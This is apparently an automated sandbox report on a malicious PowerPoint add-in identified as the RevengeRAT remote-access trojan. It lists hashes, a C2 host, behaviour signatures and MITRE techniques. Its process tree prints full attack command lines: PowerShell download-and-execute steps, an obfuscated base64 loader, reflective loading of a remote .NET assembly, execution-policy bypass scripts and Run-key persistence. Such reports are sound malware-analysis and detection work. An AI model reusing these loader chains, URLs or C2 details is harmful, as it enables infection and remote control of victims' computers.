Overview

overview

10

Static

static

1

c495ec8d68...e.ppam

windows7-x64

10

c495ec8d68...e.ppam

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-03-2024 02:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c495ec8d688d14f6e90a75d6570ffbb3f34cd716e05f661a5c57acaf7cccc10e.ppam

  • Size

    12KB

  • MD5

    a1d2e92429553425cf7505c8563b84ed

  • SHA1

    d5550fa4da1db73fb15f3fcdd8935504350c392b

  • SHA256

    c495ec8d688d14f6e90a75d6570ffbb3f34cd716e05f661a5c57acaf7cccc10e

  • SHA512

    9db3cce89055888cf4f7ef8db57dc171fa48f16a5d6724a540f16b365514672e6ec283b25cf6a3e7985c5dd57d5c7538263da690596eaa71dcac7cfeaf677f98

  • SSDEEP

    192:xrXP/Rz9m/qgC0XvXUyhRT2QiDjhmdihVGBZGinvSo0Ctbc7PHET:dXPWqgvXmQiDVm8GBklWbc7PG

Score
10/10
revengeratnyancatrevengepersistencetrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pt.textbin.net/download/zbbh8tfbo9

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

marcelotatuape.ddns.net:333

Mutex

0f84d46907494

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

    trojanrevengerat
  • Blocklisted process makes network request 7 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\c495ec8d688d14f6e90a75d6570ffbb3f34cd716e05f661a5c57acaf7cccc10e.ppam" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2160
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/Uu-eVHlE/Rka0iUpD.1b3c3483be5eabe21a44cc4fbefcdd0d -o test.js; explorer.exe test.js
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4072
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe" test.js
        3⤵
          PID:4604
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4764
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.js"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2424
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $SOgfL = 'J↪Ⅻ↫BE↪Ⅻ↫GM↪Ⅻ↫d↪Ⅻ↫Bz↪Ⅻ↫E0↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫9↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫K↪Ⅻ↫BO↪Ⅻ↫GU↪Ⅻ↫dw↪Ⅻ↫t↪Ⅻ↫E8↪Ⅻ↫YgBq↪Ⅻ↫GU↪Ⅻ↫YwB0↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫TgBl↪Ⅻ↫HQ↪Ⅻ↫LgBX↪Ⅻ↫GU↪Ⅻ↫YgBD↪Ⅻ↫Gw↪Ⅻ↫aQBl↪Ⅻ↫G4↪Ⅻ↫d↪Ⅻ↫↪Ⅻ↫p↪Ⅻ↫Ds↪Ⅻ↫J↪Ⅻ↫BE↪Ⅻ↫GM↪Ⅻ↫d↪Ⅻ↫Bz↪Ⅻ↫E0↪Ⅻ↫LgBF↪Ⅻ↫G4↪Ⅻ↫YwBv↪Ⅻ↫GQ↪Ⅻ↫aQBu↪Ⅻ↫Gc↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫9↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫WwBT↪Ⅻ↫Hk↪Ⅻ↫cwB0↪Ⅻ↫GU↪Ⅻ↫bQ↪Ⅻ↫u↪Ⅻ↫FQ↪Ⅻ↫ZQB4↪Ⅻ↫HQ↪Ⅻ↫LgBF↪Ⅻ↫G4↪Ⅻ↫YwBv↪Ⅻ↫GQ↪Ⅻ↫aQBu↪Ⅻ↫Gc↪Ⅻ↫XQ↪Ⅻ↫6↪Ⅻ↫Do↪Ⅻ↫VQBU↪Ⅻ↫EY↪Ⅻ↫O↪Ⅻ↫↪Ⅻ↫7↪Ⅻ↫CQ↪Ⅻ↫RwBh↪Ⅻ↫GI↪Ⅻ↫agBo↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫PQ↪Ⅻ↫g↪Ⅻ↫CQ↪Ⅻ↫R↪Ⅻ↫Bj↪Ⅻ↫HQ↪Ⅻ↫cwBN↪Ⅻ↫C4↪Ⅻ↫R↪Ⅻ↫Bv↪Ⅻ↫Hc↪Ⅻ↫bgBs↪Ⅻ↫G8↪Ⅻ↫YQBk↪Ⅻ↫FM↪Ⅻ↫d↪Ⅻ↫By↪Ⅻ↫Gk↪Ⅻ↫bgBn↪Ⅻ↫Cg↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫n↪Ⅻ↫Gg↪Ⅻ↫d↪Ⅻ↫B0↪Ⅻ↫H↪Ⅻ↫↪Ⅻ↫cw↪Ⅻ↫6↪Ⅻ↫C8↪Ⅻ↫LwBw↪Ⅻ↫HQ↪Ⅻ↫LgB0↪Ⅻ↫GU↪Ⅻ↫e↪Ⅻ↫B0↪Ⅻ↫GI↪Ⅻ↫aQBu↪Ⅻ↫C4↪Ⅻ↫bgBl↪Ⅻ↫HQ↪Ⅻ↫LwBk↪Ⅻ↫G8↪Ⅻ↫dwBu↪Ⅻ↫Gw↪Ⅻ↫bwBh↪Ⅻ↫GQ↪Ⅻ↫LwB6↪Ⅻ↫GI↪Ⅻ↫YgBo↪Ⅻ↫Dg↪Ⅻ↫d↪Ⅻ↫Bm↪Ⅻ↫GI↪Ⅻ↫bw↪Ⅻ↫5↪Ⅻ↫Cc↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫p↪Ⅻ↫Ds↪Ⅻ↫J↪Ⅻ↫BE↪Ⅻ↫GM↪Ⅻ↫d↪Ⅻ↫Bz↪Ⅻ↫E0↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫9↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫J↪Ⅻ↫BE↪Ⅻ↫GM↪Ⅻ↫d↪Ⅻ↫Bz↪Ⅻ↫E0↪Ⅻ↫LgBE↪Ⅻ↫G8↪Ⅻ↫dwBu↪Ⅻ↫Gw↪Ⅻ↫bwBh↪Ⅻ↫GQ↪Ⅻ↫UwB0↪Ⅻ↫HI↪Ⅻ↫aQBu↪Ⅻ↫Gc↪Ⅻ↫K↪Ⅻ↫↪Ⅻ↫g↪Ⅻ↫CQ↪Ⅻ↫RwBh↪Ⅻ↫GI↪Ⅻ↫agBo↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫KQ↪Ⅻ↫7↪Ⅻ↫Fs↪Ⅻ↫QgB5↪Ⅻ↫HQ↪Ⅻ↫ZQBb↪Ⅻ↫F0↪Ⅻ↫XQ↪Ⅻ↫g↪Ⅻ↫CQ↪Ⅻ↫RwBE↪Ⅻ↫Gk↪Ⅻ↫UQBj↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫PQ↪Ⅻ↫g↪Ⅻ↫Fs↪Ⅻ↫UwB5↪Ⅻ↫HM↪Ⅻ↫d↪Ⅻ↫Bl↪Ⅻ↫G0↪Ⅻ↫LgBD↪Ⅻ↫G8↪Ⅻ↫bgB2↪Ⅻ↫GU↪Ⅻ↫cgB0↪Ⅻ↫F0↪Ⅻ↫Og↪Ⅻ↫6↪Ⅻ↫EY↪Ⅻ↫cgBv↪Ⅻ↫G0↪Ⅻ↫QgBh↪Ⅻ↫HM↪Ⅻ↫ZQ↪Ⅻ↫2↪Ⅻ↫DQ↪Ⅻ↫UwB0↪Ⅻ↫HI↪Ⅻ↫aQBu↪Ⅻ↫Gc↪Ⅻ↫K↪Ⅻ↫↪Ⅻ↫g↪Ⅻ↫CQ↪Ⅻ↫R↪Ⅻ↫Bj↪Ⅻ↫HQ↪Ⅻ↫cwBN↪Ⅻ↫C4↪Ⅻ↫UgBl↪Ⅻ↫H↪Ⅻ↫↪Ⅻ↫b↪Ⅻ↫Bh↪Ⅻ↫GM↪Ⅻ↫ZQ↪Ⅻ↫o↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫JwCTITo↪Ⅻ↫kyEn↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫L↪Ⅻ↫↪Ⅻ↫g↪Ⅻ↫Cc↪Ⅻ↫QQ↪Ⅻ↫n↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫KQ↪Ⅻ↫g↪Ⅻ↫Ck↪Ⅻ↫OwBb↪Ⅻ↫FM↪Ⅻ↫eQBz↪Ⅻ↫HQ↪Ⅻ↫ZQBt↪Ⅻ↫C4↪Ⅻ↫QQBw↪Ⅻ↫H↪Ⅻ↫↪Ⅻ↫R↪Ⅻ↫Bv↪Ⅻ↫G0↪Ⅻ↫YQBp↪Ⅻ↫G4↪Ⅻ↫XQ↪Ⅻ↫6↪Ⅻ↫Do↪Ⅻ↫QwB1↪Ⅻ↫HI↪Ⅻ↫cgBl↪Ⅻ↫G4↪Ⅻ↫d↪Ⅻ↫BE↪Ⅻ↫G8↪Ⅻ↫bQBh↪Ⅻ↫Gk↪Ⅻ↫bg↪Ⅻ↫u↪Ⅻ↫Ew↪Ⅻ↫bwBh↪Ⅻ↫GQ↪Ⅻ↫K↪Ⅻ↫↪Ⅻ↫g↪Ⅻ↫CQ↪Ⅻ↫RwBE↪Ⅻ↫Gk↪Ⅻ↫UQBj↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫KQ↪Ⅻ↫u↪Ⅻ↫Ec↪Ⅻ↫ZQB0↪Ⅻ↫FQ↪Ⅻ↫eQBw↪Ⅻ↫GU↪Ⅻ↫K↪Ⅻ↫↪Ⅻ↫g↪Ⅻ↫Cc↪Ⅻ↫QwBs↪Ⅻ↫GE↪Ⅻ↫cwBz↪Ⅻ↫Ew↪Ⅻ↫aQBi↪Ⅻ↫HI↪Ⅻ↫YQBy↪Ⅻ↫Hk↪Ⅻ↫Mw↪Ⅻ↫u↪Ⅻ↫EM↪Ⅻ↫b↪Ⅻ↫Bh↪Ⅻ↫HM↪Ⅻ↫cw↪Ⅻ↫x↪Ⅻ↫Cc↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫p↪Ⅻ↫C4↪Ⅻ↫RwBl↪Ⅻ↫HQ↪Ⅻ↫TQBl↪Ⅻ↫HQ↪Ⅻ↫a↪Ⅻ↫Bv↪Ⅻ↫GQ↪Ⅻ↫K↪Ⅻ↫↪Ⅻ↫g↪Ⅻ↫Cc↪Ⅻ↫c↪Ⅻ↫By↪Ⅻ↫EY↪Ⅻ↫VgBJ↪Ⅻ↫Cc↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫p↪Ⅻ↫C4↪Ⅻ↫SQBu↪Ⅻ↫HY↪Ⅻ↫bwBr↪Ⅻ↫GU↪Ⅻ↫K↪Ⅻ↫↪Ⅻ↫k↪Ⅻ↫G4↪Ⅻ↫dQBs↪Ⅻ↫Gw↪Ⅻ↫L↪Ⅻ↫↪Ⅻ↫g↪Ⅻ↫Fs↪Ⅻ↫bwBi↪Ⅻ↫Go↪Ⅻ↫ZQBj↪Ⅻ↫HQ↪Ⅻ↫WwBd↪Ⅻ↫F0↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫o↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫JwBy↪Ⅻ↫GU↪Ⅻ↫dwBl↪Ⅻ↫Gk↪Ⅻ↫dg↪Ⅻ↫9↪Ⅻ↫GU↪Ⅻ↫YwBy↪Ⅻ↫HU↪Ⅻ↫bwBz↪Ⅻ↫F8↪Ⅻ↫bQB0↪Ⅻ↫HU↪Ⅻ↫PwB0↪Ⅻ↫Hg↪Ⅻ↫d↪Ⅻ↫↪Ⅻ↫u↪Ⅻ↫DQ↪Ⅻ↫Mg↪Ⅻ↫w↪Ⅻ↫DI↪Ⅻ↫Lg↪Ⅻ↫z↪Ⅻ↫D↪Ⅻ↫↪Ⅻ↫Lg↪Ⅻ↫1↪Ⅻ↫D↪Ⅻ↫↪Ⅻ↫LwBk↪Ⅻ↫GE↪Ⅻ↫bwBs↪Ⅻ↫G4↪Ⅻ↫dwBv↪Ⅻ↫GQ↪Ⅻ↫LwBM↪Ⅻ↫H↪Ⅻ↫↪Ⅻ↫VwBH↪Ⅻ↫Ho↪Ⅻ↫dQBY↪Ⅻ↫G0↪Ⅻ↫LwBt↪Ⅻ↫G8↪Ⅻ↫Yw↪Ⅻ↫u↪Ⅻ↫HQ↪Ⅻ↫a↪Ⅻ↫Bn↪Ⅻ↫Gk↪Ⅻ↫eg↪Ⅻ↫u↪Ⅻ↫GU↪Ⅻ↫cgBh↪Ⅻ↫Gg↪Ⅻ↫cw↪Ⅻ↫v↪Ⅻ↫C8↪Ⅻ↫OgBz↪Ⅻ↫H↪Ⅻ↫↪Ⅻ↫d↪Ⅻ↫B0↪Ⅻ↫Gg↪Ⅻ↫Jw↪Ⅻ↫g↪Ⅻ↫Cw↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫n↪Ⅻ↫CU↪Ⅻ↫R↪Ⅻ↫BD↪Ⅻ↫F↪Ⅻ↫↪Ⅻ↫SgBV↪Ⅻ↫CU↪Ⅻ↫Jw↪Ⅻ↫s↪Ⅻ↫C↪Ⅻ↫↪Ⅻ↫JwB0↪Ⅻ↫HI↪Ⅻ↫dQBl↪Ⅻ↫DE↪Ⅻ↫Jw↪Ⅻ↫g↪Ⅻ↫Ck↪Ⅻ↫I↪Ⅻ↫↪Ⅻ↫p↪Ⅻ↫Ds↪Ⅻ↫';$SOgfL = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $SOgfL.replace('↪Ⅻ↫','A') ));$SOgfL = $SOgfL.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\test.js');powershell $SOgfL
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1032
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$DctsM = (New-Object Net.WebClient);$DctsM.Encoding = [System.Text.Encoding]::UTF8;$Gabjh = $DctsM.DownloadString( 'https://pt.textbin.net/download/zbbh8tfbo9' );$DctsM = $DctsM.DownloadString( $Gabjh );[Byte[]] $GDiQc = [System.Convert]::FromBase64String( $DctsM.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $GDiQc ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( 'reweiv=ecruos_mtu?txt.4202.30.50/daolnwod/LpWGzuXm/moc.thgiz.erahs//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\test.js', 'true1' ) );"
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1976
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Roaming\x2.ps1"
              5⤵
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2860
            • C:\Windows\system32\cmd.exe
              cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.js"
              5⤵
                PID:4240
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\tuusk.ps1"
                5⤵
                • Blocklisted process makes network request
                • Drops file in System32 directory
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4348
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  6⤵
                    PID:5108
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3712 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
          1⤵
            PID:2168

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Initial Access

          Execution

          Persistence

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Privilege Escalation

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Defense Evasion

          Modify Registry

          1
          T1112

          Credential Access

          Discovery

          Query Registry

          4
          T1012

          System Information Discovery

          4
          T1082

          Lateral Movement

          Collection

          Exfiltration

          Command and Control

          Impact

          Resource Development

          Reconnaissance

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            2f57fde6b33e89a63cf0dfdd6e60a351

            SHA1

            445bf1b07223a04f8a159581a3d37d630273010f

            SHA256

            3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

            SHA512

            42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            1ee1e0f6dcb7024fae05b2fd88cdeb0a

            SHA1

            76953cf94b47bc07d6e1ad042f8e2e2204d3f9e7

            SHA256

            7b227fd4f3ed2a6a9f3f76b9f2e99332e240bb8f7465b92884968c73731c868d

            SHA512

            cc514b0bd4f7e1b82d765b41a0310a031a138461b04bacd0200baaee2d8ec4207ff0150cc8f9563d348daf3a04d729571efbcf123ed30ae179a80eeb7fd0ef45

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            64B

            MD5

            0613fd5ce341ab32f595c78851e7f252

            SHA1

            e2377ffaefb8541eed87007dee3a7e31eae81561

            SHA256

            07456f9a1bea2b48617a7c857bd88cd2d7e50fd3f21d52d0ac6a1017a8f6693a

            SHA512

            eab83450b861ec5b8980c4f3c77e9a3de76b3590ce02a0496cd652224a4568433339f27a6da84248bf5fdd57bd190d8040815b8e1d1676b80b54d8a2e9654125

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            6c4805e00673bef922d51b1a7137028f

            SHA1

            0eabb38482d1733dd85a2af9c5342c2cafcd41eb

            SHA256

            7af7d25fe7e3bb8b75bcffaa8573e2e9af7e7f70a840fa8bc0196d0ab396ecdd

            SHA512

            eb6dacb4e0da6f45028ebf65ebffdc6aecdb6a34a582bb69aa5836ef02a7115f6b500ef2dd6a2c2be994ec9d0cbbff564368724593666105d3d4475441830cc1

            Download Submit
          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jxlm4evy.i35.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit
          • C:\Users\Admin\AppData\Local\Temp\test.js
            Filesize

            5KB

            MD5

            fa54e506145428be81c904ce0427bc89

            SHA1

            f312b61589c99b86cb4a1d582f6bc8b70b1b8ff7

            SHA256

            423fcc28cba08d45837d483804b93674017f7bd835941075ae49b240a9e19e80

            SHA512

            9ee60151d351aadce0ddad3b8a2da21489bac004ff6eba59cd3ae0a34309cfe39b67dc8f5428ac93cc128a37a4422918b569aeb5291382801851a8030327ffad

            Download Submit
          • C:\Users\Admin\AppData\Roaming\tuusk.ps1
            Filesize

            112KB

            MD5

            599c5caab52abbf8681aeeed90739be4

            SHA1

            db4c4bdc87ae50513be5329293f6495d7c85bbf7

            SHA256

            8b6e0b09389f4c19e4fb54a15edfcde1b8b5909a984e1c26b514e7db9d2fc631

            SHA512

            dfbac1b842dbab4cb7e1fb5b2059594ba9b876496bcf4040ca138e84d5b65492812c61200cba1db934620b06cfc3cf8deeceadb286495a9d3d1e04c5ab5cee22

            Download Submit
          • C:\Users\Admin\AppData\Roaming\x2.ps1
            Filesize

            250B

            MD5

            60015324e03572c1adad771bb3e95a9e

            SHA1

            4ba92a7ae477c53b89a44c2db30350fe7436e27a

            SHA256

            d70c53731f3bfb4c8bc484464d5a80b7433d433b7a31a732e2fd6b63bab4b353

            SHA512

            704155c580b7c2a7de33a2f3f6cb9216168277daa7bf9d0809ffc8078e9b3b24de54202f3e2cd119ea3321ccbd5b9757a6733378753180d8e22cab983cd8014c

            Download Submit
          • memory/1032-111-0x0000028761790000-0x00000287617A0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/1032-96-0x00007FFD76D30000-0x00007FFD777F1000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/1032-120-0x00007FFD76D30000-0x00007FFD777F1000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/1032-68-0x00007FFD76D30000-0x00007FFD777F1000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/1032-70-0x0000028761790000-0x00000287617A0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/1976-115-0x00007FFD76D30000-0x00007FFD777F1000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/1976-87-0x00000229D9E10000-0x00000229D9E20000-memory.dmp
            Filesize

            64KB

            Download
          • memory/1976-86-0x00007FFD76D30000-0x00007FFD777F1000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/1976-91-0x00000229D9E10000-0x00000229D9E20000-memory.dmp
            Filesize

            64KB

            Download
          • memory/1976-92-0x00000229D9FD0000-0x00000229D9FD8000-memory.dmp
            Filesize

            32KB

            Download
          • memory/1976-110-0x00007FFD76D30000-0x00007FFD777F1000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/2160-30-0x000001A12C230000-0x000001A12D200000-memory.dmp
            Filesize

            15.8MB

            Download
          • memory/2160-4-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
            Filesize

            2.0MB

            Download
          • memory/2160-2-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
            Filesize

            2.0MB

            Download
          • memory/2160-54-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2160-56-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2160-55-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2160-57-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
            Filesize

            2.0MB

            Download
          • memory/2160-58-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2160-59-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
            Filesize

            2.0MB

            Download
          • memory/2160-60-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
            Filesize

            2.0MB

            Download
          • memory/2160-61-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
            Filesize

            2.0MB

            Download
          • memory/2160-1-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2160-3-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2160-7-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2160-32-0x000001A12C230000-0x000001A12D200000-memory.dmp
            Filesize

            15.8MB

            Download
          • memory/2160-0-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2160-14-0x00007FFD54A60000-0x00007FFD54A70000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2160-13-0x00007FFD54A60000-0x00007FFD54A70000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2160-12-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
            Filesize

            2.0MB

            Download
          • memory/2160-11-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
            Filesize

            2.0MB

            Download
          • memory/2160-10-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
            Filesize

            2.0MB

            Download
          • memory/2160-5-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2160-6-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
            Filesize

            2.0MB

            Download
          • memory/2160-9-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
            Filesize

            2.0MB

            Download
          • memory/2160-8-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
            Filesize

            2.0MB

            Download
          • memory/2860-95-0x000002841B2B0000-0x000002841B2C0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2860-109-0x00007FFD76D30000-0x00007FFD777F1000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/2860-106-0x000002841B2B0000-0x000002841B2C0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2860-94-0x00007FFD76D30000-0x00007FFD777F1000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/4072-49-0x000001FDC2580000-0x000001FDC2590000-memory.dmp
            Filesize

            64KB

            Download
          • memory/4072-33-0x000001FDC2690000-0x000001FDC26B2000-memory.dmp
            Filesize

            136KB

            Download
          • memory/4072-48-0x00007FFD6C440000-0x00007FFD6CF01000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/4072-65-0x00007FFD6C440000-0x00007FFD6CF01000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/4072-50-0x000001FDC2580000-0x000001FDC2590000-memory.dmp
            Filesize

            64KB

            Download
          • memory/4348-123-0x00000196C0EC0000-0x00000196C0ED0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/4348-121-0x00007FFD76D30000-0x00007FFD777F1000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/4348-122-0x00000196C0EC0000-0x00000196C0ED0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/4348-135-0x00000196C0EA0000-0x00000196C0EA8000-memory.dmp
            Filesize

            32KB

            Download
          • memory/4348-138-0x00007FFD76D30000-0x00007FFD777F1000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/5108-136-0x0000000000400000-0x000000000040A000-memory.dmp
            Filesize

            40KB

            Download
          • memory/5108-139-0x0000000075330000-0x0000000075AE0000-memory.dmp
            Filesize

            7.7MB

            Download
          • memory/5108-140-0x00000000055F0000-0x0000000005B94000-memory.dmp
            Filesize

            5.6MB

            Download
          • memory/5108-141-0x00000000051B0000-0x00000000051C0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/5108-142-0x0000000075330000-0x0000000075AE0000-memory.dmp
            Filesize

            7.7MB

            Download